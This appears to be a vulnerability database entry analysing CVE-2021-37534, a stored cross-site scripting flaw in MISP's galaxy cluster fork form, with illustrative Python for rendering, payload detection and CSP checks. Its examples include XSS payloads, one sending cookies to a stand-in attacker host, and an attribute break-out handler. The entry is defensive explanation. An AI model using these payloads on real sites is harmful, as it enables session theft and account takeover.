CVE-2021-37534 in MISP

Summary

by MITRE • 07/26/2021

app/View/GalaxyClusters/add.ctp in MISP 2.4.146 allows Stored XSS when forking a galaxy cluster.


Analysis

by VulDB Data Team • 06/23/2026

The vulnerability identified as CVE-2021-37534 is a stored cross-site scripting flaw in MISP (Malware Information Sharing Platform) version 2.4.146. It affects app/View/GalaxyClusters/add.ctp, the CakePHP view template in the web interface that renders the form for creating galaxy clusters. The flaw is triggered when a galaxy cluster is forked, a routine MISP operation that opens the add form pre-filled with an editable copy of an existing cluster's content. It lets an attacker who can create or edit cluster data plant script that is stored in the application's database and executes in the browser of any other user who later opens the affected page.

Technically the flaw is an instance of CWE-79 (improper neutralization of input during web page generation): untrusted data is written into a web page without being escaped for the context in which it appears. Here the cluster data supplied by a user is stored as submitted, which in itself is acceptable, since a threat-intelligence store legitimately has to hold arbitrary strings such as exploit snippets and odd indicator values. The defect is on the output side: the CVE names a view file, and that template renders the stored fields back into the pre-filled fork form without HTML-encoding them. Because the page echoes the value both as element text and inside attribute values, encoding that only replaces angle brackets and not quotes is still bypassable through an attribute break-out. And because the data is persistent, the payload runs in the browser of every user who views the page, not only the one who submitted it.
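To make the encoding point concrete, the following Python script models the fork round trip (submit, store, pre-fill the add form, render) with a hypothetical renderer and parses the result the way a browser would. It is an added example, not MISP's code (MISP's views are CakePHP templates, not Python); the function names, the HTML layout of the form, and both payloads are constructed for illustration. Only the field name "value" mirrors MISP's cluster field.

```python
"""Added example (not MISP code): store-then-render round trip of a galaxy
cluster fork with three output encoders, plus a parser-based check for
whether an injected payload survived. HTML layout and names are assumed."""
import html
from html.parser import HTMLParser
from typing import Callable, Dict, List, Tuple

# Constructed payloads: one aimed at element-text context, one at attribute context.
SCRIPT_PAYLOAD = ("APT-Hypothetical<script>new Image().src="
                  "'https://attacker.invalid/?c='+document.cookie</script>")
ATTR_PAYLOAD = 'benign" autofocus onfocus="alert(document.domain)'

# Hypothetical in-memory stand-in for the galaxy_clusters table.
_clusters: Dict[int, Dict[str, str]] = {}


def save_cluster(cluster_id: int, value: str) -> None:
    """Persist exactly what was submitted; encoding is an output-time concern."""
    _clusters[cluster_id] = {"value": value}


def fork_cluster(source_id: int, new_id: int) -> Dict[str, str]:
    """A fork copies the source cluster; the copy becomes the add form's data."""
    _clusters[new_id] = dict(_clusters[source_id])
    return _clusters[new_id]


def render_add_form(cluster: Dict[str, str], enc: Callable[[str], str]) -> str:
    """Render the add/fork form (assumed layout). The same field is emitted
    twice: as element text in a heading and as the value of the input."""
    v = enc(cluster["value"])
    return (
        f"<h3>Fork of {v}</h3>\n"
        f'<input type="text" name="value" value="{v}">'
    )


# Encoders: none (the vulnerable pattern), entity-only, and quote-aware.
NO_ENCODING: Callable[[str], str] = lambda s: s
TAGS_ONLY: Callable[[str], str] = lambda s: html.escape(s, quote=False)
FULL: Callable[[str], str] = lambda s: html.escape(s, quote=True)


class InjectionDetector(HTMLParser):
    """Parses the rendered markup as a browser would and records <script>
    elements and on* event-handler attributes, which this form never emits."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Tuple[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "script":
            self.findings.append(("script-element", tag))
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.findings.append(("event-handler", name))


def injected(rendered: str) -> List[Tuple[str, str]]:
    """Return the list of live script elements / event handlers in the page."""
    p = InjectionDetector()
    p.feed(rendered)
    p.close()
    return p.findings


def probe(payload: str, enc: Callable[[str], str]) -> List[Tuple[str, str]]:
    """Store a cluster carrying the payload, fork it, render, and report."""
    save_cluster(1, payload)
    return injected(render_add_form(fork_cluster(1, 2), enc))


if __name__ == "__main__":
    for name, enc in (("none", NO_ENCODING), ("tags-only", TAGS_ONLY), ("full", FULL)):
        for pname, payload in (("script", SCRIPT_PAYLOAD), ("attr", ATTR_PAYLOAD)):
            print(f"{name:9s} {pname:6s} -> {probe(payload, enc)}")
```

Running it shows the three outcomes the paragraph describes: with no encoding both payloads survive; with angle-bracket-only encoding the script tag is neutralised but the attribute payload still breaks out of value="..." and installs an onfocus handler; only the quote-aware encoder leaves nothing executable. CakePHP's h() helper, which wraps htmlspecialchars with ENT_QUOTES, corresponds to the FULL encoder here.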

The operational impact goes well beyond a pop-up. The injected script runs in the MISP web interface with the viewing user's session, so it can read whatever that user can read, issue authenticated requests in that user's name (creating, altering or deleting events, attributes and clusters, or changing sharing settings), steal session cookies where they are not marked HttpOnly, or redirect the user to a phishing page. The ATT&CK reference given here, T1566 (Phishing), is a delivery technique rather than a tactic, and stored XSS is not a server-side vector: the attacker's code executes client-side in other users' browsers, and any privilege gained is the victim's, so a payload viewed by a site administrator effectively escalates privilege. Because the script is stored, it keeps firing until the offending cluster data is cleaned up, potentially hitting many users over a long period. That is particularly concerning for security operations teams that rely on MISP for threat-intelligence sharing, since a compromised analyst session exposes sensitive threat data and the ability to tamper with it.

Mitigation for CVE-2021-37534 combines patching with defence in depth. Organisations running MISP 2.4.146 should upgrade to a release later than 2.4.146 that fixes the rendering in app/View/GalaxyClusters/add.ctp. The correct fix is output encoding: every stored field written into the template must be HTML-encoded for its context, which in CakePHP means wrapping it in the h() helper, whose ENT_QUOTES encoding also covers values placed inside attributes. Input filtering is of limited value here, because MISP has to store arbitrary indicator text. Because the payload lives in the database independently of the template fix, existing galaxy clusters, including forks created while the vulnerable version was deployed, should be reviewed for stored markup after the upgrade. A Content-Security-Policy whose script-src does not permit 'unsafe-inline' blunts what an injected script can do, and an HttpOnly session cookie keeps it out of reach of script. Web-server and MISP application logs can be watched for cluster create and fork requests carrying script tags or event-handler attributes, which indicate exploitation attempts. Finally, code review of view files should confirm that every echo of user-controlled data is encoded, so the same pattern does not resurface elsewhere in the application.
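Two of those post-patch checks, as an added example that is neither MISP's code nor part of this entry: scan_export() sweeps a galaxy-cluster JSON export for HTML and script markers so a payload stored before the upgrade is found and removed, and csp_allows_inline_script() evaluates a Content-Security-Policy header. The export below is constructed and only approximates the shape of MISP's JSON output; the GalaxyCluster/GalaxyElement/value/description names mirror MISP's API, everything else in it is made up.

```python
"""Added example (not MISP code): sweep a cluster export for stored markup and
evaluate a CSP header. SAMPLE_EXPORT is constructed; its shape approximates
MISP's galaxy-cluster JSON and is an assumption, not a guarantee."""
import json
import re
from typing import Any, Dict, List, Tuple

# Markers that have no place in cluster names, descriptions or element values.
MARKERS = re.compile(
    r"<\s*/?\s*[a-z][a-z0-9]*"   # any HTML tag start or end
    r"|javascript\s*:"            # script URIs
    r"|\bon[a-z]+\s*=",           # event-handler attributes
    re.IGNORECASE,
)

SAMPLE_EXPORT_JSON = """
[
  {"GalaxyCluster": {
     "id": "1", "uuid": "00000000-0000-4000-8000-000000000001",
     "type": "threat-actor", "value": "Demo Actor",
     "description": "Constructed benign cluster.",
     "GalaxyElement": [
       {"key": "synonyms", "value": "DemoGroup"},
       {"key": "refs", "value": "https://example.invalid/report"}
     ]}},
  {"GalaxyCluster": {
     "id": "2", "uuid": "00000000-0000-4000-8000-000000000002",
     "type": "threat-actor", "value": "Demo Actor<img src=x onerror=alert(document.domain)>",
     "description": "Constructed cluster forked from id 1 with a stored payload.",
     "GalaxyElement": [
       {"key": "synonyms", "value": "DemoGroup"},
       {"key": "refs", "value": "javascript:alert(document.domain)"}
     ]}}
]
"""
SAMPLE_EXPORT = json.loads(SAMPLE_EXPORT_JSON)


def scan_export(obj: Any, path: str = "$") -> List[Tuple[str, str]]:
    """Walk a JSON document recursively; return (json_path, matched_marker)
    for every string value that carries one of the markers."""
    hits: List[Tuple[str, str]] = []
    if isinstance(obj, dict):
        for key, val in obj.items():
            hits += scan_export(val, f"{path}.{key}")
    elif isinstance(obj, list):
        for idx, val in enumerate(obj):
            hits += scan_export(val, f"{path}[{idx}]")
    elif isinstance(obj, str):
        m = MARKERS.search(obj)
        if m:
            hits.append((path, m.group(0)))
    return hits


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP header into {directive: [sources]}. Per the spec, a
    repeated directive is ignored after its first occurrence."""
    policy: Dict[str, List[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def csp_allows_inline_script(header: str) -> bool:
    """True if inline <script> blocks and on* handlers would run under this
    policy: script-src governs scripts, default-src is the fallback, and no
    directive at all means no restriction. A nonce or hash source in the
    same directive disables 'unsafe-inline' in CSP Level 2 browsers."""
    policy = parse_csp(header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True
    lowered = [s.lower() for s in sources]
    if "'unsafe-inline'" not in lowered:
        return False
    return not any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
                   for s in lowered)


if __name__ == "__main__":
    for path, marker in scan_export(SAMPLE_EXPORT):
        print(f"stored markup at {path}: {marker!r}")
    for hdr in ("default-src 'self'", "default-src 'self'; script-src 'self' 'unsafe-inline'"):
        print(f"{hdr!r}: inline script allowed = {csp_allows_inline_script(hdr)}")
```

On the constructed export the scan flags the forked cluster's value and one of its elements and nothing in the benign cluster; on a real instance the same walk can be run over the JSON returned by the REST API after the upgrade, and any hit should be checked by hand rather than deleted blindly, since indicator text can legitimately contain angle brackets. The CSP check is deliberately conservative: a policy that never mentions script-src or default-src offers no protection against this class of bug at all.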

Reservation

07/26/2021

Disclosure

07/26/2021

Moderation

accepted

CPE

ready

EPSS

0.00504

KEV

no

Activities

low
